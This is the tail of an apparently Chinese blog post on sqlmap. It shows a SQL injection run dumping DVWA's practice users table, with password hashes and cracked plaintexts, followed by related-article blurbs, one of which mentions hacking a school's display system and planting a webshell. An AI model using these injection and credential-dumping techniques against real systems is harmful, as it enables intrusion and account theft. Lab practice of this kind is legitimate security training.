[09:44:12] [INFO] using suffix '?'
[09:44:22] [INFO] using suffix ';'
[09:44:32] [INFO] using suffix '..'
[09:44:42] [INFO] using suffix '!!!'
[09:45:02] [INFO] using suffix ', '
[09:46:38] [INFO] using suffix '@'
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[09:46:49] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149\dump\dvwa\users.csv'
[09:46:49] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:46:49] [WARNING] your sqlmap version is outdated

[*] ending @ 09:46:49 /2022-05-26/

懒笑翻
关注
  • 3
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap无需python环境
01-23
sqlmap注入,安全行业必备工具。sql注入也是漏洞top10,支持多种数据库
实战渗透-看我如何拿下自己学校的大屏幕(Bypass)1
08-03
实战渗透:掌握攻防策略,规避网络保护机制】 这篇实战渗透的文章主要讲述了作者如何通过自己的技巧和经验,成功地对一所学校的大屏幕管理系统进行了安全检测。文章首先介绍了作者在网络安全领域的学习经历,强调...
kail自带sqlmap版本过低如何解决
m0_61851859的博客
02-26 2790
那么应该如何解决呢?(其实非常简单) 我们需要将当前sqlmap删除,并重新下载sqlmap
安全测试必备工具——SQLMap 安装及基本应用
最新发布
朱雀随云记的博客
04-30 795
输入:python sqlmap.py -u http://192.168.253.137/vulnerabilities/sqli/?3、进入解压后的目录,在显示目录路径位置输入cmd回车,在弹出的命令行窗口,输入 python sqlmap.py即开启工具使用。运行过程中需要用户输入y/n才能进入下一步操作,如果希望跳过这些,可以在命令末尾加 --batch。2、将下载好的sqlmap-master.zip压缩包,解压到自己需要的目录。--current-db:获取当前数据库。
fatal: 无法访问 ‘网址‘:GnuTLS recv error (-54): 在 pull 函数中出错。
qq_67667368的博客
05-01 4032
git clone https://github.com/sqlmapproject/sqlmap git clone命令时出现fatal: 无法访问 '网址':GnuTLS recv error (-54): 在 pull 函数中出错。命令 cd /usr/share进入share文件,ls查看当前文件夹是否有sqlmap(10行14列)搜索网上得知将https改为git即可,但是我还是么有成功,然后我又在此基础上在网址后面加上l '.git'结果还是报错,如图。
iwebsec靶场 SQL注入漏洞通关笔记2- 字符型注入(宽字节注入)
mooyuan的博客
11-26 3061
打开靶场,url为id=1如下所示本次渗透的关卡为字符型注入,其实总结来讲本关卡的难度相对而言作为第二关有些难度。通过源码再来分析下SQL注入重点内容:(1)闭合方式是什么?iwebsec的第02关关卡为字符型,闭合方式为单引号(2)注入类别是什么?这部分是宽字节型注入,需要使用%df(3)是否过滤了关键字?很明显通过源码,iwebsec的字符型关卡无过滤任何信息。
dns缓存
qq_35543858的博客
01-25 736
查看dns缓存 ipconfig/displaydns 清除dns缓存 ipconfig/flushdns DNS缓存介绍 记录种类 A记录是指定域名对应的IP地址。 AAAA记录一个域名对应的IPv6地址 NS记录 是指定由哪个DNS服务器解析你的域名。 MX记录 是指邮件交换记录,记录了在当前网络下,存在的mail服务器 CNAME记录 是指别名记录,允许多个域名对应一个ip ...
Web漏洞-access注入、Sql Sever(Mssql)注入、PostgreSql注入、Orache注入、MongoDB注入、Oracle注入-SQLmap使用教程-附实例
ran的博客
01-15 1763
Mongodb的查询文档方式与其他的数据库略微不同,当进行条件查询的时候,mysql是用where,而mongodb是以键值对形式(类似于JSON)进行查询的。这里是一个跟Mysql数据库的一个不同的位置,PostgreSql数据库union select后用。因为access数据库不包含数据库名,所以直接从表名开始查询。最后将password解密后进入后台复制KEY提交即可。”,所以在注入过程中需要我们进行暴力猜解。------>注意与Mysql进行对比。在进行注入时,要注意对。sqlmap使用教程。
WEB渗透基础实战详解.pdf
11-07
"WEB渗透基础实战详解" 本文主要讲解了WEB渗透的基础知识,包括SQL注入漏洞、WEB渗透整个过程的还原、sqlmap工具的使用等。 WEB渗透基础知识 在WEB渗透中,SQL注入漏洞是最常见的漏洞之一。SQL注入漏洞是指攻击...
代码能力在渗透测试实战中的价值.pdf
10-19
本文将深入探讨代码能力在渗透测试实战中的价值,并结合案例分析其重要性。 首先,对于渗透测试工程师来说,掌握编程技能能够帮助他们更有效地发现和利用漏洞。例如,对于物联网设备的渗透测试,如案例中提到的...
【推荐】最新超全的渗透测试学习基础教程集合(84份).zip
08-04
04.实验吧CTF实战WEB渗透和隐写术解密; 05.IDA Pro反汇编工具初识及逆向工程解密实战; 06.OllyDbg动态分析工具基础用法及Crakeme逆向破解; 07.快手视频下载之Chrome浏览器Network分析及Python爬虫探讨; 08.Web...
实战-从社工客服拿到密码登录后台加SQL注入绕过安全狗写入webshell到提权进内网漫游.pdf
03-21
"实战渗透测试笔记" 本资源为一篇实战渗透测试笔记,记录了作者从社工客服拿到密码登录后台加 SQL 注入绕过安全狗写入 webshell 到提权进内网漫游的整个过程。 一、初探 作者首先尝试使用自制字典工具“御剑”...
在Kali Linux下使用sqlmap
热门推荐
312小公举的专栏
05-14 3万+
Sqlmap是一款开源的命令行自动SQL注入工具。它能够对多种主流数据库进行扫描支持。 1.启动xampp 2.测试的网站是DVWA,security level设为medium,因为在sqlmap安全等级设为low,medium,high都是一样的操作步骤。 3.启动Tamper Data(tools->tamper data) 4.测试一下
win版本的sqlmap报错解决
weixin_42075643的博客
01-29 5148
原来好好地环境突然报如下错: 查了好久资料,竟然没人遇到过 解决方法: python sqlmap.py --update 没想到吧,完美解决,原来是版本低的原因,我也是醉了,以此记录下。。。
sqlmap工具使用手册
u012002125的博客
06-17 2183
sqlmap 是一个开源渗透测试工具,它可以自动检测和利用 SQL 注入漏洞来接管数据库服务器。它具有强大的检测引擎,同时有众多强大功能,包括数据库指纹识别、从数据库中获取数据、访问底层文件系统以及在操作系统上带内连接执行命令。...
sqlmap代码
qq_46648283的博客
05-20 6134
Microsoft Windows [版本 10.0.19044.1706] (c) Microsoft Corporation。保留所有权利。 D:\sqlmap>sqlmap.py -u http://localhost/pikachu/vul/sqli/sqli_str.php?name=Tony&submit=%E6%9F%A5%E8%AF%A2 --current -db ___ __H__ ___ ___[)]_____ ___ ___ {1..
SQLMAP脚本-sql-labs-Less-46-50
m0_69844818的博客
01-07 374
Less-46这个直接看后端代码吧可以看到这后端是使用了order by排序查询所以没办法在后面拼接union但可以使用报错注入啊order by和union想同时使用需要加双方都加括号,这里只能控制union的括号无法控制order by的所以不行但我们把后端加上括号....即可拿下使用sqlmap跑一下编写脚本cx.py[Y/n]这个选项记得选n不然它就猜字段了,根本猜不了Less-47。
Kali中更新sqlmap步骤(直接更新会失败)
xiaohujiang的博客
07-10 1万+
1. 问题场景 如果安装老版本的sqlmap(Kali默认安装)经常破解不了,所已建议更新到最新版本。 更新命令为:sqlmap -update,直接执行这个命令,总是出错。 2. 解决办法 解决方法: 找到sqlmap的路径/usr/share/salmap 执行 cd /usr/share/ 然后删掉sqlmap rm -rf sqlmap/ 然后执行 git clone https://github.com/sqlmapproject/sqlmap 然后进入文件夹直接执行.py文件即可,或者加入到
sqlmap requires ‘python-pymysql‘ third-party library
weixin_43376075的博客
11-13 1008
[CRITICAL] sqlmap requires 'python-pymysql' third-party library in order to directly connect to the DBMS 'MySQL'. You can download it from 'https://github.com/PyMySQL/PyMySQL'. Alternative is to use a package 'python-sqlalchemy' with support for dialect 'm
什么是SQL注入漏洞-SQLmap注入
05-21
SQL注入漏洞是一种常见的Web应用程序安全漏洞,攻击者通过在输入数据中插入恶意的SQL代码,使应用程序接受并执行其代码,从而获得不应该被揭示的敏感信息。SQLmap是一种流行的自动化工具,用于检测和利用Web应用程序中的SQL注入漏洞。它通过发送各种恶意有效载荷来测试目标网站是否存在SQL注入漏洞,并自动获取目标数据库的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

懒笑翻

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值